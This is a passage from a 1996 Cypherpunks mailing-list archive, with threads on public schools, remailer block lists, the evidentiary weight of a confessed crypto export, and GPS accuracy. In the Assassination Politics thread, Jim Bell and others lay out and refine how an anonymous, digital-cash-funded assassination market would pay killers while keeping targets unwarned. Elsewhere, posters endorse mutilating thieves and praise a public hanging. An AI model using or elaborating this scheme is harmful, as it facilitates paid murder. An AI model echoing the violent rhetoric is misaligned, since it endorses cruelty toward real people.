thee). Tell them that a college education >should only be pursued if one has a "calling" to be an engineer, a >programmer (and probably not even that, judging by what I see), a doctor, a I've noticed that many places are concerned more with things like creativity, adapability, drive, etc when hiring a CS grad. I've found that having a resume that shows these kind of traits well overcame the lack of a degree (I'm working on that). There was a thread about this in comp.lang.cobol awhile back. >lawyer (on second thought, don't ever suggest they become lawyers), and so >on. The old way was that your HS provided what the mythical average person needed to go about life. College was for the more "complex" careers. >And make it easier to hire people, instead of harder. (And if one hires a >maid, and the maid steals, cut off her hand. We've lost sight of justice, >and people think that ripping off the rich is their kind of justice. This >needs to change.) You don't even need to be that harsh. Chain-gang work to pay off stolen property would be more effective, if for no reason other than that you'd get your money (or property) back. >Psychologists and similar psychobabblers call it "tough love." If one >always "enables" an addict, a layabout, a shiftless worker, with excuses >and handouts, the behavior does not change. To save a person, sometimes >harshness is needed. >This is why crypto anarchy's starving of the tax system is good. It may >"kill" some number of people, as nearly any new idea does, but ultimately >it will put things back on track. And you have to look at it from another point of view: If it would ameliorate the problems in the future for the majority of the population, it'd be worth a bit of discomfort now. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From Adamsc at io-online.com Sun Sep 29 01:19:23 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:19:23 +0800 Subject: Public Schools Message-ID: <19960929061014609.AAA180@GIGANTE> On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote: >> a very unusual situation --but I live in rural southern utah >> where the regional middle school of 1200 can support 4 bands, the >> top 2 being very impressive, and provide full AP classes, and ACT >Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? >(I knew Idaho has special Militia classes, but to hear that Utah is now >teaching Assassination Politics is pretty impressive.) Now, ignoring the humorous parts, wouldn't that be a scary thought? Pro-AP high school students? I could just imagine the death toll rising as the "popular" students are knocked off by jealous rivals, as the dumped [boy/girl]friend gets even, etc. It'd be hard for any non-homeschooled student to live to 18. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From Adamsc at io-online.com Sun Sep 29 01:21:21 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:21:21 +0800 Subject: Public Schools Message-ID: <19960929061007859.AAA183@GIGANTE> On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote: >> a very unusual situation --but I live in rural southern utah >> where the regional middle school of 1200 can support 4 bands, the >> top 2 being very impressive, and provide full AP classes, and ACT >Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? >(I knew Idaho has special Militia classes, but to hear that Utah is now >teaching Assassination Politics is pretty impressive.) Now, ignoring the humorous parts, wouldn't that be a scary thought? Pro-AP high school students? I could just imagine the death toll rising as the "popular" students are knocked off by jealous rivals, as the dumped [boy/girl]friend gets even, etc. It'd be hard for any non-homeschooled student to live to 18. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From stewarts at ix.netcom.com Sun Sep 29 01:22:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 16:22:16 +0800 Subject: Making Remailers Widespread Message-ID: <199609290623.XAA25627@dfw-ix3.ix.netcom.com> At 01:06 PM 9/28/96 -0400, "Mark M." wrote: >Since maintaining a block list is probably one of the most time-consuming tasks >involved with operating a remailer, it would be a Good Thing to add an option >to the remailer cgi program to operate as a "middleman" remailer. This would >only require the remailer operator to add or remove entries from a list of >allowed destinations. The operator wouldn't have to deal with disclaimers and >would only receive complaints from other operators if the remailer is >malfunctioning in some way. That's another good approach, though a second-string objective compared to having full-scale terminal remailers running everywhere. But it's clearly a strong fallback position, and might be easier to get people to adopt and not turn off. It does depend on the availability of a list of working remailers with the correct feature sets, plus adequate distribution of either PGP keys or some S/MIME-related equivalent. One way to do that is to parse Raph's list appropriately (and check signatures on that); another is to have some centralized (sigh) DNS server do a round-robin distribution so that random.remailer.net picks a random known-good remailer to deliver through, perhaps also delivering a PGP key. I'd far prefer a distributed solution, but this does let people volunteer to take heat for a little while and dispose of their remailers if they have to. In particular, it may be useful for winsock remailers that are willing to connect up and be a delivery remailer when they're connected and disconnect when they're unavailable. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From Adamsc at io-online.com Sun Sep 29 01:27:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:27:45 +0800 Subject: Public Schools Message-ID: <19960929062437375.AAA157@GIGANTE> On Sat, 28 Sep 1996 20:53:51 -0500 (CDT), snow wrote: >> = . There is a solution. Trade Schools, >> The problem was simple: we have only the now retiring >> toolmakers who make it all possible. engineering graduates will >> not observe the manufacturing floors since it is above their >> dignity to roll of their sleeves. > I knew too many engineering students to believe this. I knew one >(Civil Engineering) who had been a Paramedic, he wanted grease and >dirt on his hands, it may be harder to wash off, but much easier to >sleep off. Nice point, BTW! I think he was engaging in a bit of hyperbole but he still had a point. How many people (in any profession) have had to use what they produce? How many hardware engineers types have had to actually hook up a mission critical network with the router they designed? More likely, how many of you on the list work for someone who has done the same work you're doing? How many of the programmers have to use their own programs on a daily basis? Now, compare with the rest of the world (particularly on that last one). > Prove? I don't know, but it is some pretty solid evidense. Communism >at it's finest. A community of people who work together and take care of >each other voluntarily for the common good. Communism should sound familar to any Jew or Christian. The idea of caring for others in the community is a key part - it's hard to say that you have love for your neighbor if you can't give him a meal while he's out of work (assuming of course you have food yourself - although many in the great depression did anyway). It's when this kind of activity is state-mandated that you have this problem. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From bdavis at thepoint.net Sun Sep 29 01:36:21 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 29 Sep 1996 16:36:21 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Fri, 27 Sep 1996, Timothy C. May wrote: > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > >His admission that he used the notebook. Recovering the notebook and > >finding the software. Interviewing the Customs agent working at the time. > > His admission that he used _which_ notebook? Chain of evidence again. > > Finding _which_ software? > > (As for the Customs agent, I can assure you that my luggage has never been > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > Customs could figure out who was working at the time I putatively entered > the country, and even if he remembered _me_, months later, just what > records would he have, and how would they stand up in court?) > > Hearing me say I "exported crypto," a hearsay claim, and happening to find ^^^^^^^^^^^^^^^ It is an admission against interest and a confession; it is admissible against the speaker in a prosecution against him for "exporting crypto" from a strictly evidentiary standpoint. > one or more laptops at my home, weeks or months later, implies nothing. (To > make the point graphically, suppose the raiding party finds _several_ > laptops or notebooks...do they assume _all_ were taken out of the country, > or do they pick the one with the most incriminating software on it? Answer: > Unless they can _prove_ one of them was used, and that it had not been > _changed_ since the putative event (highly unlikely), they cannot simply > _assume_ one of them was taken out. Your understanding of evidence is inaccurate. The evidence re the laptop[s] would be admissible and the parties would argue about what it meant. The jury is entitled to draw common sense inferences. That might be easy to do in a case in which a defendant has confessed.... > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > So? I installed it last week. My trip to Europe was last summer.") So now you, as your own lawyer (apparently) have decided to take the stand and testify. Remember that the prosecutor gets to cross-examine you. Things are about to get ugly.... > > >Considering the headaches required for airline travel today, it's not like > >there aren't serious records abound. > > Such as? I recall no inspections of my luggage, no inventorying of the > serial numbers of my laptops, no inspection whatsoever of my > magneto-optical drives (which were in my carry-on luggage, and not even > glanced at, in the box they were in). X-rays would not prove what was taken > in or out of the country, even if "x-ray escrow" were implemented (which it > is not, according to all reports I have heard, and based on some practical > limits on storage), I doubt the records of a trip, say, last summer (of > '95) could be retrieved and prove that a particular laptop was taken out. > Not to mention that the software allegedly taken out might have been on any > kind of media, none of them distinguishable with an x-ray machine. Circumstantial evidence is admissible if probative of a fact at issue in the case. Evidence that you took a laptop out of the country is probative of the allegation that you exported crypto using a laptop. > >For crying outloud, he admitted to the world that he took the software > >out. I put that in front of a jury and it looks just like the typical > > "For crying out loud" is bluster, not legal argument. And your understanding of evidence shows a misunderstanding of how the rules of evidence actually work in a courtroom. > >stupid bragging criminal. Any defense about "I was just kidding" or "The > >message was forged" might be interesting, but it will sound like > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > Legal proof is still needed. Given only a nebulous statement like "I > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > is not enough for a case even to be brought to trial. You are absolutely wrong. It may not be enough for a conviction, but it will beat a Rule 29 motion (Motion for a judgment of acquittal) and get the case to the jury. > (If it reached trial, I would expect a defense attorney to move for > dismissal. Absent any evidence that a crime occurred, absent any proof > beyond the nebulous hearsay statement of a "braggart," there is simply no > basis for criminal action.) > > "Stupid bragging criminals" may be common, but bragging is not in and of > itself illegal. There still has to be evidence of a crime. Must a jury believe that you were "just bragging" because you now, in a criminal trial, say that you were? > "Produce the body." Perry Mason is only active in re-runs. > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > body, or witnesses, does this mean I'll be found guilty? To use BU's > phrasing, "for crying out loud.") That's where prosecutorial discretion comes in and a judge's and jury's common sense comes in if the prosecutor runs amok. BTW, I am far more willing to believe you were bragging about whacking Jimmy Hoffa than about exporting crypto. Think of all the interesting evidence from this mailing list's archives that prosecutors would attempt to introduce against you ... Not to say that *I* couldn't get you off, but not the way you propose. EBD > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From Adamsc at io-online.com Sun Sep 29 01:36:52 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:36:52 +0800 Subject: Public Schools Message-ID: <19960929063154625.AAA234@GIGANTE> On Sat, 28 Sep 1996 23:23:32 -0400 (EDT), themom wrote: >I have to agree with the final Quote....I am Good in math, chemistry and >computer science I am good in any Logical cource but I have trouble in >places liek " Creative Writing" I take all AP cources and make A's and >B every now and again in english...I have a 3.7 gpa but a LOW sat in the >grammar and english sections, 1100 in all I don't think colleges should >look at the subjects you dont plan to major in...I plan to major in >computer science when I go to college, so I dont think they should look >so much at say english, or biology. I get so frustrated in some of those >classes....BTW I am a Junior in highschool I recently graduated HS and am at the local community college preparing to transfer to a 4-year. Meaningless indicators as follows: 3.9GPA, 1490 SAT (800 Verbal 690 Math - I haven't had a math course since Trig/Precalc in my sophomore year - I was 2 years ahead but moved to 2 districts which didn't even have calculus) - which is up 120 points from my freshman year. Anyway, as far as what colleges look for, they do care about non-major classes but don't, obviously, weight them as highly. As far as the real world (i.e. employment) goes, many places realize you aren't going to learn much in 4 years. They want to see not that you have specific experience but that you know how to think and especially how to teach yourself. If you can show that you can adapt well to market changes you probably won't have to worry about work... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From stewarts at ix.netcom.com Sun Sep 29 01:43:18 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 16:43:18 +0800 Subject: Making Remailers Widespread [REMAILERS] Message-ID: <199609290623.XAA25604@dfw-ix3.ix.netcom.com> There have been several good replies - thanks! >> Doing two-way remailers would be better, but that's still a hard problem, >> and I don't want to widely deploy shoddy two-way-remailers. >Unfortunately, one-way remailers have much fewer uses than two-way remailers, >any many of these uses are abusive. I agree, it's a problem; the return address seems to reduce abuse. But one-way remailers can be used to simulate many of the uses of two-way, especially with message-pool return methods (e.g. alt.anonymous.messages.) Doing two-way remailers well is hard - most of the methods around are ok for passive attacks, but may not resist subpoenas, rubber-hose, or crackers. It's especially hard if you want the remailer to be a no-brainer to install and operate, rather than one that requires expert support. Snow's one-shot reply block method is interesting, whether you do a public-key or secret-key approach (if you do public key, you obviously use the public half for the part that stays at the remailer.) It has the real advantage that compromising the remailer doesn't give you the reply information for past or current messages, so you can only compromise one message at a time, which is a big win over the one-key-per-remailer reply blocks. I think I like it. On the other hand, there are a host of potential problems: - Chaining is probably more difficult, at least return-chaining. - Individual True Believer remailer operators would usually resist cooperating with authorities to decrypt the reply block, but ad-hoc remailer operators who are just running a remailer because they haven't turned off the default feature that came with their Web Server will probably reveal the key, especially for Politically Incorrect material (definition depends on their individual politics, of course.) - A web form interface, filled out from a web anonymizer, doesn't give you a useful return address, so spammers can still abuse it. - You have to decide how much persistence to use for the reply block. One-shots are more secure, but aren't helpful for replies to web postings or other multiple-recipient communication, but timeouts have their own problems. >> - A centralized block list (e.g. http://www.remailer.net/block.txt) >> which all of the form-based remailers could load and reference would >> allow non-picky operators not to have to handle it themselves >A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. >A blocking request sent to one will be replicated in the other automatically. Good point. A bit tough to implement in a no-brainer out-of-the-box remailer; you gain a bit by having the block list point to an address that's really a round-robin DNS spinner of some sort, but that still leaves you with centralization. >> [centralized blocking list; handshake with cookies ] >> - this is a bit messier for mailing lists, but we can ignore... > >We can't quite ignore... In the scheme you've just described, someone can >enter a blocking request via a Web page and give a submission request for >some mailing list, and the cookie will be e-mailed to the mailing list. Yeah. This makes it easy to block anonymous remailer input to (say) the cypherpunks mailing list, since _any_ mailing list user can block. Putting a never-block list at the blocking server is a possibility, and would require some announced policy for implementing it. >> - special-case for "postmaster", who may want to block >> all of foo.domain instead of just postmaster at foo.domain >> - special-special-case for postmasters of big sites, e.g. aol, netcom >> who we may want to ignore? >I don't think it's a good idea to suport blocking receivers in an entire >domain, like *@aol.com. Just say it's not supported. Blocking an entire domain like *@aol.com is mostly bad. Blocking an entire domain like *@myconsultingfirm.com is fine. Deciding the boundary between the two is, um, amusing :-) I'd probably set it such that ISPs don't get blocked, but non-ISPs do, though that might change if the administrator of aol.com asks five million users to submit individual blocking request. I suppose this means there's a volume question here :-) Having a don't-block list that individuals can subscribe to would help. >> - A sender-blocking list is harder, and may still take human attention >I don't think it's a good idea to support sender blocking at all. There are some spammers you'd like to stop quickly when a Spam Event is happening. There are broken email gateways that may need blocking. There are known abusers you might want stopped. And there are folks like president at whitehouse.gov who can be presumed to be forgeries :-) A sender-blocking list administered by the Remailer Cabal* would be a reasonable default for no-brainer remailers, and obviously it should be possible for remailer-admins to override or ignore if they want. >Would the receiver blocking list be available to everyone to view? That >sounds like a violation of privacy. Someone suggested on this list that >(assuming that the entires are addresses that match exactly, not regular >expressions), one can store hashes of addresses. That's worth doing, or at least thinking about seriously. The most interesting regular expressions are *@domain (which you can handle by keeping separate block lists for domains and full addresses (or a merged list that the using remailer checks both)) and *@*.domain and user@*.domain - e.g. alice at mailserver17.big-isp.com, which would successfully deliver mail to alice at big-isp.com. Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com) and check subsets of the domain name? This is creeping featurism, but it may be the right way to go to set a good precedent. One unfortunate result of only using hashed names and not readable names is that it doesn't help the current remailer operators, since their existing code doesn't work that way. Keeping the file of real names encrypted and only distributing it to the Remailer Cabal seems leaky at best :-) - I'd expect to see it remailed to some public place just on principle. snow wrote: > Off the top of my head, the biggest problem is that you can't send > email to a web site (page). You can easily send it to a procmail program at a web site, though, which can take care of doing the right thing with it. Mark M.'s pointer to netcat is especially relevant for this. > Netcat can be used pretty easily to fetch URLs > (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80). [*The existence of the Remailer Cabal, viewed by some as a shadowy subversive conspiracy, and by others as Dedicated Public Servants has been repeatedly denied by anyone in a position to know. :-) ] # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Sun Sep 29 02:15:14 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 29 Sep 1996 17:15:14 +0800 Subject: Technical difficulties with AP [AP NOISE] Message-ID: <199609290715.AAA12227@mail.pacifier.com> At 09:07 PM 9/28/96 -0700, Bill Stewart wrote: >Aside from details like dead bodies, vendettas, and government suppression, >there are technical complications with Assassination Politics >that make it more than the simple job Jim Bell is imagining. >Some of them provide ways to defend against AP, and turn it into more like >Extortion Politics. > > [Do I _really_ want to bring up more discussion of AP? > Not sure, but if it's clear that it won't work very well, > it'll be less likely for the government media to freak about :-)] OTOH, if it's going to work, the earlier you're satisfied about that the better, huh? >Let's look at the critical part of the problem - paying the assassin. >The model we've generally been using is that the players are the >victim, the escrow agent who manages the system, an enthusiastic public, >and the assassin or assassins who are competing for the jackpot. All of whom could play multiple roles in difference circumstances, incidentally, at different times. The public should be particularly interested in this process, BTW, because they realize that someday they may want to participate as donors, bettors, or they may have no choice but to participate as...victims. >I can see three approaches to identifying the correct payee: >1) Payee provides physical evidence to the escrow agent - > the traditional approach doesn't work here: since the > escrow agent is anonymous, so you can't mail him the > victim's wallet or finger with well-known fingerprint or whatever. >2) Assassin leaves physical evidence at the scene which the news media > would be likely to report, which payee confirms with escrow > agent, presumably committing in advance (e.g. after the event, > the payee sends a key which allows the escrow agent to decode > the encrypted message that said "I'm leaving a note on the body > saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'.") > Works fine for the first couple of assassinations, but after a while > the police will catch on and stop revealing kinky details to the media. >3) The main solution has been the gambling deal - > it's just a lottery on the date of death of the victim, which presumably > the payee will win because he knows when the assassin will strike. > For a lottery to be effective, prospective assassins need to > be able to determine how much the jackpot is and who the victim is, > so they can place their bets and be the closest winner. There are a number of advantages to the gambling scenario. The first, obviously, is that it is, technically, gambling, and gambling is legal in many locales and "accepted" (morally) in most. The second is that being gambling, no participant other than an assassin knows, for sure, that the person collecting the payoff is actually guilty of any crime. A third is that to many people, gambling is fun, which means that they are already primed to partipate. > But the prospective victim can also play, individually or as part > of an insurance pool (which is especially valuable for victims like > "the first IRS agent to be assassinated".) Obviously you don't want > to just bid up the price on your own head, so it needs to be accompanied > by publicity that the IRS Agents' Benevolent Association is placing > a large number of small bets every day to maximize the chances that > _they_ will collect the money rather than the assassins. > If the times that the bets are for are published, you can beat this, > but you also invite speculators to be small bets just before and after > your bets, so it becomes a mishmash and perhaps a race condition. > If the times aren't published, the assassin can make lots of bets > surrounding the planned date of the hit, which is also a warning > to the prospective victim to be careful if the bets on his demise > start increasing rapidly. The way I've envisioned it, the bettor must commit to his prediction, but he then encrypts it so that nobody else knows what he's predicted, either the date or the target, and he must "buy" his prediction by including digital cash. One advantage of this system is that the victim isn't warned (although the victim is already aware of how much money has been donated to fund the prize), but a potential disadvantage is that there might be a collision between the predictions of two or more people. This probably can't be entirely avoided, but it can be minimized by forcing the bettors to compete with their bets. It is impractical for a person who just guesses to make such a bet, against somebody who knows the date. The bettor doesn't reveal the decrypt key to the particular prediction involved unless he chooses to do so; when he does presumably, it's because the prediction has come true. A failed prediction isn't disclosed, so it doesn't alert anyone else, including the "escrow agent" AP organization. The amount of digital cash included with the prediction will be revealed publicly, the moment it is received by the organization, as well as the (still encrypted) prediction. Saving these predictions allows anyone to verify (after the decrypt key has been released) that the prediction actually identified a particular person. This allows the public and the other players to verify that the game is being played honestly. > This does make the AP lottery somewhat of an extortion deal - > by advertising that someone is a target, you're forcing them to > continually make lots of bets. This, of course, is only true if the specifics of the predictions are revealed, which is not the scenario I envision. Obviously, revealing the predictions allows the victim to lay low whever he's likely to be hit, which is why I think that's a bad idea. > But if they've got any way of tracing > money, even partially, it'll help them find the escrow agent, > who can then be targeted for justice of one sort or another. > You're also forcing the assassin to make lots of bets, though in > a jackpot system the successful payee will recover most of it. It is at least conceivable that an assassin won't know the exact date he'll be successful. If he sends a letter-bomb, for instance, he won't know for sure when that letter will be delivered, or the day it will be opened. However, he need merely make two or three predictions, and he won't have to make the last one or two unless the prediction didn't come true on the first day. Multiple predictions does raise his cost, but it will still be economical to do given the probabilities. > To some extent the defense can be fought if the escrow agent > wants to establish a minimum bet, say $100, which an assassin > can afford to make a few of for the targeted day, but the > victim can't keep paying too much. This also reduces the > since of the potential better pool, and therefore reduces > the jackpot and the attractiveness of the job to the assassin. > Lots of people might be willing to spend $5 to contribute; > $100 bets are much fewer, especially if there are enough > targets to successfully overthrow a government. Originally, I had anticipated that the AP organization would require specific payments included with a prediction based on the value of the reward and the estimated probability of the death on any particular day. I was never comfortable with this system, because it would involve a great deal of calculation based on numbers that no particular people know. I don't know whether you saw my idea a couple weeks ago in which I pointed out that it should merely be necessary to allow all predictors to include whatever amount of money they want with their prediction, with the reward split up and paid to all successful predictors, pro-rated based on the size of their contribution. This shifts the burden to the public to estimate the amount they should include, which should be okay since a predictor is probably a fairly good judge of the probabilities associated with his target. At least hypothetically, it means that an assassin might have a portion of his reward "stolen" by another lucky predictor, but this is unlikely and in any case, the fact that this loss was genuine can be verified by all participates after the fact. And a predictor need merely increase the value included with the prediction to increase his pro-rata share of the reward. Jim Bell jimbell at pacifier.com From attila at primenet.com Sun Sep 29 02:58:02 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 17:58:02 +0800 Subject: Public Schools In-Reply-To: <19960929061014609.AAA180@GIGANTE> Message-ID: <199609290816.CAA26768@infowest.com> In <19960929061014609.AAA180 at GIGANTE>, on 09/28/96 at 11:11 PM, Adamsc at io-online.com (Adamsc) said: On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote: > attila wrote: >> a very unusual situation --but I live in rural southern utah >>where the regional middle school of 1200 can support 4 bands, the >> top 2 being very impressive, and provide full AP classes, and ACT >Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special >Lecturer? (I knew Idaho has special Militia classes, but to hear that Utah is >now teaching Assassination Politics is pretty impressive.) Now, ignoring the humorous parts, wouldn't that be a scary thought? Pro-AP high school students? I could just imagine the death toll rising as the "popular" students are knocked off by jealous rivals, as the dumped [boy/girl]friend gets even, etc. It'd be hard for any non-homeschooled student to live to 18. considering our history of persecution, and our acceptance of the bloody marches across America, driven my mobs --I doubt you could get an Jim Bell AP movement going. despite the fact the Federal army (an entire army) occupied Utah for almost 50 years and the U.S. refused statehood for almost 50 years, everyone is still basically very patriotic. yeah, as a humourous thought for the theatre of the absurd, active AP might be ideal in NYC, LA, Chicago, Detroit, Cleveland, Buffalo, and the District of Columbia with surrounding regions. let them clean themselves up for 9 cents a pop. can't you just see Marion Barry on his knees begging for his life, promising to keep you in crack heaven!?  "That's our advantage at Microsoft;  we set the standards and we can change them."  --- Karen Hargrove, Microsoft  (quoted in the Feb 1993 Unix Review editorial)  and, if this is not the gawd-awful truth, I must have just got off the bus... typical, typical MS arrogance. a toast! a toast to their early demise! From dlv at bwalk.dm.com Sun Sep 29 03:02:45 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:02:45 +0800 Subject: [AP] Afghanistan Message-ID: Afghanis publicly hanged their former president, Najibullah [no last name]. Other countries should follow their example. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:12:59 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:12:59 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis In-Reply-To: <01BBAD88.C073E980@geeman.vip.best.com> Message-ID: "geeman at best.com" writes: > Huh? > Since when is (408) in San Diego? San Jose then. San something or other. Silicon Valley. I dislike California enough to view it as one undifferentiated nasty blob. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:41:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:41:44 +0800 Subject: GPS In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: > >I think figuring out a way to turn off A/S and getting accurate GPS on > >commercial equipment at all times would make a nifty Cypherpunks project > >- if it really involves breaking some encryption. > > Essentially the A/S works by having the publicly-readable signal > contain fuzz fuzz in the low-order bits and the encrypted signal contain > the real stuff; if they've done decent encryption, you won't crack it. Do we know for sure that they've got decent encryption? Aircraft aren't the only market for GPS. There's a fad to put GPS in cars - it's already very common in Japan, and Americans are catching up. They're used in conjunction with computerized road maps. Here improving the accuracy of one's position on the map might make for a very successful commercial product. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:51:10 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:51:10 +0800 Subject: Technical difficulties with AP [AP NOISE] In-Reply-To: <199609290407.VAA20253@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: ... > 2) Assassin leaves physical evidence at the scene which the news media > would be likely to report, which payee confirms with escrow > agent, presumably committing in advance (e.g. after the event, > the payee sends a key which allows the escrow agent to decode > the encrypted message that said "I'm leaving a note on the body > saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767' > Works fine for the first couple of assassinations, but after a while > the police will catch on and stop revealing kinky details to the medi ... I don't think it matters who the actual assassin is. Re-read Jim's essay. Let's suppose Tim May, the notorious deranged psychipath, wants my pal Ether Dyson dead. Tim May places a bet with a bookie that Ether Dyson lives for another year, affecting the odds. A horde of potential assassins see that the odds have changed, and place bets of their own that she won't live for another year. Then they all try to nail her. If one of them succeeds, then everyone who bet against Tim May has won, and it doesn't matter which one nailed her. After the hit, the pigs would likely want to look at the list of people who bet one way or the other, which is why the communications with the bookie should be anonymous. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gdcochra at utep.edu Sun Sep 29 04:04:03 1996 From: gdcochra at utep.edu (Gerard D. Cochrane Jr.) Date: Sun, 29 Sep 1996 19:04:03 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Brian Davis wrote: > On Fri, 27 Sep 1996, Timothy C. May wrote: > > > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > > > >His admission that he used the notebook. Recovering the notebook and > > >finding the software. Interviewing the Customs agent working at the time. > > > > His admission that he used _which_ notebook? Chain of evidence again. > > > > Finding _which_ software? > > > > (As for the Customs agent, I can assure you that my luggage has never been > > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > > Customs could figure out who was working at the time I putatively entered > > the country, and even if he remembered _me_, months later, just what > > records would he have, and how would they stand up in court?) > > > > Hearing me say I "exported crypto," a hearsay claim, and happening to find > ^^^^^^^^^^^^^^^ > It is an admission against interest and a confession; it is admissible > against the speaker in a prosecution against him for "exporting crypto" > from a strictly evidentiary standpoint. > > > one or more laptops at my home, weeks or months later, implies nothing. (To > > make the point graphically, suppose the raiding party finds _several_ > > laptops or notebooks...do they assume _all_ were taken out of the country, > > or do they pick the one with the most incriminating software on it? Answer: > > Unless they can _prove_ one of them was used, and that it had not been > > _changed_ since the putative event (highly unlikely), they cannot simply > > _assume_ one of them was taken out. > > Your understanding of evidence is inaccurate. The evidence re the > laptop[s] would be admissible and the parties would argue about what it > meant. The jury is entitled to draw common sense inferences. That might > be easy to do in a case in which a defendant has confessed.... > > > > > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > > So? I installed it last week. My trip to Europe was last summer.") > > So now you, as your own lawyer (apparently) have decided to take the > stand and testify. Remember that the prosecutor gets to cross-examine > you. Things are about to get ugly.... > > > > > > >Considering the headaches required for airline travel today, it's not like > > >there aren't serious records abound. > > > > Such as? I recall no inspections of my luggage, no inventorying of the > > serial numbers of my laptops, no inspection whatsoever of my > > magneto-optical drives (which were in my carry-on luggage, and not even > > glanced at, in the box they were in). X-rays would not prove what was taken > > in or out of the country, even if "x-ray escrow" were implemented (which it > > is not, according to all reports I have heard, and based on some practical > > limits on storage), I doubt the records of a trip, say, last summer (of > > '95) could be retrieved and prove that a particular laptop was taken out. > > Not to mention that the software allegedly taken out might have been on any > > kind of media, none of them distinguishable with an x-ray machine. > > Circumstantial evidence is admissible if probative of a fact at issue in > the case. Evidence that you took a laptop out of the country is > probative of the allegation that you exported crypto using a laptop. > > > > > >For crying outloud, he admitted to the world that he took the software > > >out. I put that in front of a jury and it looks just like the typical > > > > "For crying out loud" is bluster, not legal argument. > > And your understanding of evidence shows a misunderstanding of how the > rules of evidence actually work in a courtroom. > > > > >stupid bragging criminal. Any defense about "I was just kidding" or "The > > >message was forged" might be interesting, but it will sound like > > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > > > Legal proof is still 